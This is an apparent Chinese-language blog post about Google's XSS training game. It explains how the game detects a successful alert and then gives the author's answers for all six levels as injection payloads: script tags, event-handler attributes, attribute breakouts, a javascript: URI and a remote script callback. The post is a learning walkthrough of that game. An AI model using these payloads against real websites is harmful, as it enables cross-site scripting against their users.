google最近出了一個xss的遊戲:
https://xss-game.appspot.com/
我這個菜鳥看提示,花了兩三個小時才全過了。。
這個遊戲的規則是隻要在攻擊網頁上彈出alert視窗就可以了。
題目頁面是在iframe裡嵌套的展現的,那麼父視窗是如何知道iframe裡成功彈出了視窗?
是這樣子實作的:
題目頁面加載了這個js,改寫了alert函數,當alert被調用時,向parent發送一個消息。
https://xss-game.appspot.com/static/game-frame.js
然後父視窗注冊了一個eventlistener來接收這個消息:
https://xss-game.appspot.com/static/game.js
最下面是題目的答案。如果想自己玩遊戲的,慎拉下。
題目的答案:
level1:
<script>alert(1)</script>
level2:
<input onmouseover="alert(1)">
level3:
https://xss-game.appspot.com/level3/frame#3.jpg' onload="alert(1)">
level4:
3');alert('1
level5:
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)
level6:
重點是前面要有一個空格。
https://www.google.com/jsapi?callback=alert
遊戲過關之後,google給出了一個xss的文檔:
https://www.google.com/about/appsecurity/learning/xss/index.html